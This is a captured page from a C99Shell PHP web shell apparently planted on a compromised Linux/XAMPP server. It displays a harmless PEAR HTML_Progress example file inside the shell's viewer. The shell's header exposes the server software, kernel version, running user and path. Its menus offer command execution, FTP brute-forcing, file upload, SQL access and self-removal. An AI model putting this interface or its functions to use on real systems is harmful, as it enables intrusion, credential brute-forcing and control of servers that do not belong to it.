!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/HTML_Progress/examples/preload/   drwxr-xr-x
Free 9.87 GB of 61.93 GB (15.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     shockwaveflash.html (2.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
PEAR::HTML::Progress example: Listener usage with HTTP_Request

Examples TOCexamples

Preload Shockwave Flash object

$Date: 2005/07/25 11:23:37 $

 Table of contents

Introduction

This example requires :

  • PEAR::HTTP_Request 1.2.2 or better (see source at line 14).
  • PEAR::HTML_Progress 1.1 or better (see source at line 16).

Be aware that:

  • HTTP_Request has dependencies (Net_URL 1.0.12+, Net_Socket 1.0.2+)


This example will display a basic progress bar while retrieving a large file.

We have created a Request/Listener class HTTP_Request_DownloadListener on lines 18 to 104. In this Listener, a progress bar was integrated on lines 78 to 84. It's a basic progress bar with only one render option changed (animation speed).

On lines 90 and 92 the progress bar is updated depending of the data size already received.

Media file is identify by URL defined at line 106.

When the shockwave flash object is fully loaded, page sw4p.html is shown on lines 115 to 117.

[Top]

 Render options

Animation speed is set to 10 (see source at line 79).

[Top]

 PHP source syntax highlight

Open source listing in a new window.

[Top]

 Play demo

Run the script.

[Top]


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.2793 ]--